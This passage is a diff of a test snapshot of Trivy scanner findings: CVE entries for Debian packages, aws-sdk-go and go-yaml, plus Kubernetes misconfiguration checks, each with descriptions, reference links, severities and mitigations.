- "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'lurker' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20210107192922-496545a6307b", + "packageName": "gopkg.in/yaml.v3", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -96074,62 +97044,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", ], }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", @@ -96137,1926 +97102,2795 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": 